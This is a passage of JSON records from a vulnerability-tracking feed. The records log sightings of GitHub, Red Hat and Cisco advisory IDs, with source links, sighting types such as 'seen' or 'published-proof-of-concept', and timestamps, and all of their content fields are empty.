{"uuid": "9a108c36-50b9-4cf2-95a1-a98c7801fbc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-964w-f6gj-5236", "type": "seen", "source": "https://gist.github.com/alon710/3d4b381ed70bde1d61201f63076c47f0", "content": "", "creation_timestamp": "2026-07-28T23:31:57.769441Z"}, {"uuid": "b42b4ded-1d8e-4870-8168-b266fddcfaf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-44JH-J22R-33WQ", "type": "published-proof-of-concept", "source": "https://t.me/EchelonEyes/1200", "content": "", "creation_timestamp": "2026-07-29T00:00:52.888410Z"}, {"uuid": "9d9ab6d7-81d4-4a3c-86ad-dce8a600e305", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "RHSA-2020:4157", "type": "seen", "source": "Telegram/FZOsY2k7WJ6AFbS8POLza0WyKoHuy17v_x6w4oGouFfsv88", "content": "", "creation_timestamp": "2026-07-29T12:01:09.222485Z"}, {"uuid": "00ce5fe4-c8bc-4b6d-95f8-df2d1c833e78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W9VV-Q986-VJ7X", "type": "seen", "source": "https://t.me/hn_best_comments/30331", "content": "", "creation_timestamp": "2026-07-29T12:01:06.387226Z"}, {"uuid": "09e3766b-ed90-453d-8e17-ac81f5321208", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8m8r-38jm-f355", "type": "seen", "source": "https://gist.github.com/alon710/9d9829ba6ab40face903027898206e80", "content": "", "creation_timestamp": "2026-07-29T13:32:26.673801Z"}, {"uuid": "c7437e2c-6fc0-4610-a9be-36bdc73b4462", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-954p-556p-r752", "type": "seen", "source": "https://gist.github.com/alon710/6612cc2025e5b81484a44c804b090d50", "content": "", "creation_timestamp": "2026-07-29T14:31:27.730838Z"}, {"uuid": "11c591a3-8f98-4151-a897-3fd6d6738806", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v3r7-h72x-cjcm", "type": "seen", "source": "https://bsky.app/profile/nodeland.dev/post/3mrsa2mxyaw2c", "content": "", "creation_timestamp": "2026-07-29T15:21:09.249453Z"}, {"uuid": "ef0826b7-1235-4839-81ce-0f76d0b444a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8xcm-r25x-g524", "type": "seen", "source": "https://bsky.app/profile/nodeland.dev/post/3mrsa2mvibp2t", "content": "", "creation_timestamp": "2026-07-29T15:21:08.804041Z"}, {"uuid": "2a8d45f6-ded9-4f29-8f6e-64172bd3bcc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m8rv-5g2x-5cg5", "type": "seen", "source": "https://bsky.app/profile/nodeland.dev/post/3mrsa2mleb52m", "content": "", "creation_timestamp": "2026-07-29T15:21:08.376170Z"}, {"uuid": "4a600ba4-a372-48be-836e-2aceab10a769", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jr45-8vmc-qm54", "type": "seen", "source": "https://bsky.app/profile/nodeland.dev/post/3mrsa2lvynu25", "content": "", "creation_timestamp": "2026-07-29T15:21:07.744251Z"}, {"uuid": "21d4d7de-85be-4d54-9566-c595d880b7b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4cwx-7wf7-3272", "type": "seen", "source": "https://bsky.app/profile/nodeland.dev/post/3mrsa2kt7jx23", "content": "", "creation_timestamp": "2026-07-29T15:21:07.008154Z"}, {"uuid": "2e8dfa30-bf32-4c51-ac29-9c8393fdc596", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w284-33mx-6g9v", "type": "seen", "source": "https://gist.github.com/alon710/2872dac20223d7dd754cee0ee5c0587f", "content": "", "creation_timestamp": "2026-07-29T15:31:13.108816Z"}, {"uuid": "ed8d9974-bdca-45de-a1f9-36830cf1442f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4p3g-4hcj-wpvx", "type": "seen", "source": "https://gist.github.com/alon710/fffec7ff7a3f093df17d5e871ff03c84", "content": "", "creation_timestamp": "2026-07-29T16:32:11.700505Z"}, {"uuid": "9b977b8c-1124-426e-8433-caf20477e454", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jq8w-8q2f-ffm9", "type": "seen", "source": "https://gist.github.com/alon710/122d827ca97ab8457c12647e94a1482c", "content": "", "creation_timestamp": "2026-07-29T17:31:36.335251Z"}, {"uuid": "13af4295-33da-4b77-9eed-75038fece1bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M985-3F3V-CWMM", "type": "seen", "source": "https://t.me/reverseame/1405", "content": "", "creation_timestamp": "2026-07-30T00:02:45.557285Z"}, {"uuid": "d6050510-d8c5-43b4-a755-28b69d096b86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PW56-C55X-CM9M", "type": "seen", "source": "https://t.me/reverseame/2897", "content": "", "creation_timestamp": "2026-07-30T00:02:33.761648Z"}, {"uuid": "726ab4df-5edf-45ab-9275-9bd17d07950c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "RHSA-2020:4157", "type": "seen", "source": "Telegram/FZOsY2k7WJ6AFbS8POLza0WyKoHuy17v_x6w4oGouFfsv88", "content": "", "creation_timestamp": "2026-07-30T00:01:47.993031Z"}, {"uuid": "ec205944-f5f2-40f8-a061-a1991d6154c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W9VV-Q986-VJ7X", "type": "seen", "source": "https://t.me/hn_best_comments/30331", "content": "", "creation_timestamp": "2026-07-30T00:01:46.890166Z"}, {"uuid": "398a3037-0aaa-49b1-86f4-b247d26e83e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xvg2-cgv6-6h7v", "type": "seen", "source": "https://gist.github.com/alon710/4f3175144e6d12e46b24b49c3b567546", "content": "", "creation_timestamp": "2026-07-30T00:01:11.161381Z"}, {"uuid": "216b5fb4-aeb9-471f-94bc-687628460b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mjqf-28ph-426h", "type": "seen", "source": "https://gist.github.com/alon710/6b983b3c12e54633ff798b9f48527899", "content": "", "creation_timestamp": "2026-07-30T00:01:11.058196Z"}, {"uuid": "8d9380e6-2724-4be7-9f16-669228ee8c20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4jc5-g844-4x33", "type": "seen", "source": "https://gist.github.com/alon710/d1939c63ece21d1bd9e89d2add282b5b", "content": "", "creation_timestamp": "2026-07-31T01:31:12.318774Z"}, {"uuid": "4b3daecd-182e-4759-9c5c-46a0323b4139", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5p9g-j988-pcwv", "type": "seen", "source": "https://gist.github.com/alon710/eb7bbb63a594430d7d6ab18e1b915ebd", "content": "", "creation_timestamp": "2026-07-31T02:31:09.830596Z"}, {"uuid": "08c35379-4ce3-454e-9c8e-cd8e6af12c3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h669-8m4g-r2hc", "type": "seen", "source": "https://gist.github.com/alon710/0adfedd2017833afe3a395108d8a9b0f", "content": "", "creation_timestamp": "2026-07-31T03:34:09.092447Z"}, {"uuid": "43c748b1-5401-4e75-a08d-21fb6f683bd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52jp-gj8w-j6xh", "type": "seen", "source": "https://gist.github.com/alon710/2fc91b89bbac8024e4e2b03ecca2ce62", "content": "", "creation_timestamp": "2026-07-31T04:31:56.340358Z"}, {"uuid": "b7a63643-0e34-4dfc-86dd-f6eba73c3ec9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7683-3w9x-ch42", "type": "seen", "source": "https://gist.github.com/alon710/14986c8aa9f0de6cc9812b6e85b52624", "content": "", "creation_timestamp": "2026-07-31T05:31:42.225656Z"}, {"uuid": "ab69057b-a390-45c6-8c06-c1cbeb3cbba3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RCR6-4JQH-J84M", "type": "seen", "source": "https://t.me/cyberwarehouse/1178", "content": "", "creation_timestamp": "2026-07-31T06:00:03.357296Z"}, {"uuid": "beb37621-12a5-47e1-bcc8-3cef182d2be5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rjr6-rcgv-9m7m", "type": "seen", "source": "https://gist.github.com/alon710/f097a8ec4fd3160f0611d4f0d84400e7", "content": "", "creation_timestamp": "2026-07-31T07:31:41.987566Z"}, {"uuid": "54c9f0e5-8518-43d4-9963-476b6afaec43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xc5w-4v5w-7x65", "type": "seen", "source": "https://gist.github.com/alon710/006ebdb624799640fa8e05feb88f3b11", "content": "", "creation_timestamp": "2026-07-31T08:32:20.858347Z"}, {"uuid": "0c578909-d367-4807-957c-9be19bef34fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jm28-2wcr-qf3h", "type": "seen", "source": "https://gist.github.com/alon710/4da77a0fb37a106d6065c5dabb250f4c", "content": "", "creation_timestamp": "2026-07-31T09:31:22.233164Z"}, {"uuid": "6c03bc37-28bb-483a-8e46-deeed58f0bb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xpxj-f2fm-rqch", "type": "seen", "source": "https://gist.github.com/alon710/ebcd683ed5c708ce9306a8ed3912a91a", "content": "", "creation_timestamp": "2026-07-31T10:32:17.565912Z"}, {"uuid": "018d05e1-5d09-4694-a808-d821b58a3f2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XR9X-R78C-5HRM", "type": "seen", "source": "https://t.me/bdufstecru/3355", "content": "", "creation_timestamp": "2026-07-31T14:00:04.423246Z"}, {"uuid": "5728f2b3-8eb1-4027-b4dc-596adbd9f963", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-BFD", "type": "published-proof-of-concept", "source": "Telegram/hGorQbjXAWCmitjk3p41x3VI_IGJuK055h4LBYzY57_Q4Q", "content": "", "creation_timestamp": "2026-08-01T14:00:05.529521Z"}, {"uuid": "53967d3d-b09d-4880-981b-0073c4185f83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8vr5-263f-x5r3", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mrzrg36jmq2d", "content": "", "creation_timestamp": "2026-08-01T15:20:24.623623Z"}, {"uuid": "94a1eed1-b94d-4f9a-89f9-6d49cf8f8e0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M42G-XG4C-5F3H", "type": "published-proof-of-concept", "source": "https://t.me/sdnv_funkhole/1604", "content": "", "creation_timestamp": "2026-08-01T19:00:03.278079Z"}, {"uuid": "e9f0647e-1dbb-4dd5-89f4-fa923182e9a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FVCV-HH55-X3R4", "type": "published-proof-of-concept", "source": "https://t.me/nxblog/1758", "content": "", "creation_timestamp": "2026-08-01T20:00:05.965416Z"}, {"uuid": "91a84360-5e9b-4c5c-b840-0effe8df7dc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4C8J-MGM4-QQVP", "type": "seen", "source": "https://t.me/nxblog/1745", "content": "", "creation_timestamp": "2026-08-01T20:00:05.792429Z"}, {"uuid": "ac794dbe-eb07-48da-81b5-0db255fc527b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3f7w-8rr8-f37f", "type": "seen", "source": "https://gist.github.com/alon710/e29226c330282c9416a9859028fe2877", "content": "", "creation_timestamp": "2026-08-04T08:31:39.801578Z"}, {"uuid": "537eef04-e5c7-4217-8753-2d1d7c939c05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-524p-v8jx-3fw6", "type": "seen", "source": "https://gist.github.com/Correctover/96443c637dcce0f9133003cf3a10990a", "content": "", "creation_timestamp": "2026-08-04T08:29:03.092410Z"}, {"uuid": "980a8c7d-7ee4-427b-a760-334ecf87f8d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4xrf-jv44-h6hh", "type": "seen", "source": "https://gist.github.com/alon710/7d8f1377f69b3f931098d4cd17c3c6cd", "content": "", "creation_timestamp": "2026-08-04T09:31:38.498258Z"}, {"uuid": "777b7dfb-525b-44bc-81e9-e7dd71833eb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-22jq-vg5j-6vgg", "type": "seen", "source": "https://gist.github.com/alon710/539d26ece962aef59230f2218cc50bae", "content": "", "creation_timestamp": "2026-08-04T10:32:20.366879Z"}, {"uuid": "6a07bffd-246b-4b14-b5ba-63cda6811a73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m8rv-5g2x-5cg5", "type": "seen", "source": "https://gist.github.com/alon710/3e65ccff71476d14ba3166941f39bd3f", "content": "", "creation_timestamp": "2026-08-04T11:32:23.979283Z"}, {"uuid": "74934a47-18ca-4208-af12-a582c842cf36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-SMI2", "type": "exploited", "source": "https://t.me/Kaspersky4media/97", "content": "", "creation_timestamp": "2026-08-04T12:00:09.348172Z"}, {"uuid": "5130effa-c2b9-42e9-a8fa-f0e6f841124b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jr45-8vmc-qm54", "type": "seen", "source": "https://gist.github.com/alon710/dbd628dcf4d2ee2986aea22ad7d6f2b4", "content": "", "creation_timestamp": "2026-08-04T12:31:53.607869Z"}, {"uuid": "567c9313-3b58-4f91-86f5-2371fa74ce89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F82V-JWR5-MFFW", "type": "seen", "source": "https://t.me/wh_lab/82", "content": "", "creation_timestamp": "2026-08-04T13:00:23.519685Z"}, {"uuid": "9923c0a2-180b-413e-a91e-c488dc84893f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RG69-33G2-MP48", "type": "seen", "source": "https://t.me/cyberok_news/97", "content": "", "creation_timestamp": "2026-08-04T13:00:22.615561Z"}, {"uuid": "0b1b9157-ac17-4c09-9429-c8fe35a3dcac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C8CC-PHH7-XMXR", "type": "seen", "source": "https://t.me/cyberok_news/154", "content": "", "creation_timestamp": "2026-08-04T13:00:21.681362Z"}, {"uuid": "2fffe594-a14e-4c9a-9909-aa3521742e30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-V4PR-FM98-W9PG", "type": "seen", "source": "https://t.me/cyberok_news/173", "content": "", "creation_timestamp": "2026-08-04T13:00:19.709005Z"}, {"uuid": "0cbcf7e9-d636-496e-b61d-9230b9869254", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M93H-4HW7-5QCM", "type": "seen", "source": "https://t.me/cyberok_news/232", "content": "", "creation_timestamp": "2026-08-04T13:00:18.959636Z"}, {"uuid": "bc1b8476-85c1-4c77-9966-37fd4a96287a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H2P2-W857-329F", "type": "seen", "source": "https://t.me/kiberdruzhinnik/73", "content": "", "creation_timestamp": "2026-08-04T13:00:05.473752Z"}, {"uuid": "eef3a118-c657-4175-b47c-bd1423d616fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hxvh-4h3w-prp9", "type": "seen", "source": "https://gist.github.com/alon710/75a8da6231b4389c07987c60b53a1e91", "content": "", "creation_timestamp": "2026-08-06T05:31:22.130588Z"}, {"uuid": "3a3e925c-4b1f-45c9-b41b-00d3d980f6f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7p4m-qxvv-g567", "type": "seen", "source": "https://gist.github.com/alon710/49b7a81d033518d9857d9b26baae89fd", "content": "", "creation_timestamp": "2026-08-06T06:31:10.829878Z"}, {"uuid": "1cc6f9bb-61c2-4f2c-a276-5852a093804f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4vr5-p2gc-h23p", "type": "seen", "source": "https://gist.github.com/alon710/7cd2b59244b6ec677e9295bd453cf08b", "content": "", "creation_timestamp": "2026-08-06T07:31:27.662468Z"}, {"uuid": "2cacb2cf-fd00-4f92-9b4b-ecb0d770c246", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gx4c-2hqx-cw2r", "type": "seen", "source": "https://gist.github.com/alon710/8a116e77ebf57ab04c0fd9d4c43203c2", "content": "", "creation_timestamp": "2026-08-06T08:31:35.547619Z"}, {"uuid": "0c1311d1-21ad-469e-81ec-2b534f07e9dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fqj9-69pf-6pjg", "type": "seen", "source": "https://gist.github.com/alon710/7ddcb99c6c6e60ab01c10a8cda75b225", "content": "", "creation_timestamp": "2026-08-06T09:31:29.359323Z"}, {"uuid": "585eca8f-8007-4cc0-98ea-761acc1044d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2m8m-jhrm-w6j2", "type": "seen", "source": "https://gist.github.com/alon710/67103eb26c8040be3d1015d9a77a7298", "content": "", "creation_timestamp": "2026-08-06T10:32:49.854736Z"}, {"uuid": "472374ed-90a8-4674-81ba-4548789b142b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H4MF-4V27-HGGJ", "type": "seen", "source": "https://gist.github.com/alon710/16a5e6da3d279fedecbd3519f100eaf1", "content": "", "creation_timestamp": "2026-08-06T11:31:09.500481Z"}, {"uuid": "3a60973a-0da3-4221-8b80-024169d985e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8c48-q9wj-3w37", "type": "seen", "source": "https://gist.github.com/alon710/d60715eb4915a2fe25854150e00d6548", "content": "", "creation_timestamp": "2026-08-06T12:31:36.695543Z"}, {"uuid": "4177fa33-fa81-4c8b-8834-0f690bdbbd8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8mxv-9xhp-86h4", "type": "seen", "source": "https://gist.github.com/alon710/719fff48bd5faded3e0e79faaf3782f6", "content": "", "creation_timestamp": "2026-08-06T13:32:14.085238Z"}, {"uuid": "82e44e19-1d14-492d-bda0-049df7b94948", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8V25-V8P6-QF7V", "type": "seen", "source": "https://gist.github.com/alon710/24bef11b86322cc9770e86fa941513f4", "content": "", "creation_timestamp": "2026-08-06T14:32:29.877977Z"}, {"uuid": "39872836-157e-4d62-bde7-3e5190d77687", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3X6R-WXXG-53VV", "type": "seen", "source": "https://gist.github.com/alon710/164398037554120d630a453295ebf3cc", "content": "", "creation_timestamp": "2026-08-06T15:31:19.585107Z"}, {"uuid": "dfe5df2f-d933-46d5-b9a2-db6d7b761409", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3ccp-42pg-hgv6", "type": "seen", "source": "https://gist.github.com/alon710/44f5ca1944b401eb63cfb2fdd265ca45", "content": "", "creation_timestamp": "2026-08-06T16:31:29.213690Z"}, {"uuid": "8e32f2ec-4847-42e4-9874-453c98eb1043", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x677-9fxg-v5c5", "type": "seen", "source": "https://gist.github.com/alon710/b0c30693be99e5683b1b7fa34bf1c9d1", "content": "", "creation_timestamp": "2026-08-06T17:31:27.831992Z"}, {"uuid": "dea959ff-1061-40df-8513-9020bfe1c65a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cxjq-mrr5-89rv", "type": "seen", "source": "https://gist.github.com/alon710/1c8a7f596af5fdd35dfa04b0effb7a0b", "content": "", "creation_timestamp": "2026-08-06T18:31:30.227506Z"}, {"uuid": "248a7467-52c5-4887-8b4f-b88a54cd2962", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8rxv-jg7p-wvg3", "type": "seen", "source": "https://gist.github.com/alon710/73aecb4bf7a9c9303fe6451f784d95ea", "content": "", "creation_timestamp": "2026-08-06T19:32:23.752299Z"}, {"uuid": "49c2d14e-ffd4-4c97-af9b-b469c8fb5dda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c4c3-pg64-4m4v", "type": "seen", "source": "https://gist.github.com/alon710/1523a448808a9bd39531599fad70a2e8", "content": "", "creation_timestamp": "2026-08-06T20:32:06.872949Z"}, {"uuid": "6f0ca1b8-c2f8-4691-8ee5-2fc8024d9175", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-957R-QF9P-67XW", "type": "seen", "source": "https://gist.github.com/alon710/40498cd7ab099bfd269056fcd2fad5d7", "content": "", "creation_timestamp": "2026-08-06T22:32:31.545402Z"}, {"uuid": "9b8721d4-8116-4002-a09d-c65598fc41f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6hr6-w5qg-qmwg", "type": "seen", "source": "https://gist.github.com/alon710/91251538851544e4ecb69dd2c9aa7a2b", "content": "", "creation_timestamp": "2026-08-06T23:32:34.165846Z"}, {"uuid": "949b1f65-6e1f-4806-9cc9-defc7740ee92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6hr6-w5qg-qmwg", "type": "seen", "source": "https://gist.github.com/alon710/91251538851544e4ecb69dd2c9aa7a2b", "content": "", "creation_timestamp": "2026-08-07T00:07:12.182692Z"}, {"uuid": "246cccd3-4912-4506-b6e4-8dae5888d2d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-957R-QF9P-67XW", "type": "seen", "source": "https://gist.github.com/alon710/40498cd7ab099bfd269056fcd2fad5d7", "content": "", "creation_timestamp": "2026-08-07T00:05:24.914689Z"}, {"uuid": "4675f070-b978-44ad-96ea-ca341dd6ccaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HHV7-P4PG-WM6P", "type": "published-proof-of-concept", "source": "https://t.me/Intel_Encyclopedia/925", "content": "", "creation_timestamp": "2026-08-10T00:00:33.025100Z"}, {"uuid": "831fdad3-dc86-4c01-872c-8276fd4490a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HHV7-P4PG-WM6P", "type": "published-proof-of-concept", "source": "https://t.me/Intel_Encyclopedia/865", "content": "", "creation_timestamp": "2026-08-10T00:00:32.888638Z"}, {"uuid": "71ec406f-fa83-460e-9ef2-0d9d6dbd0523", 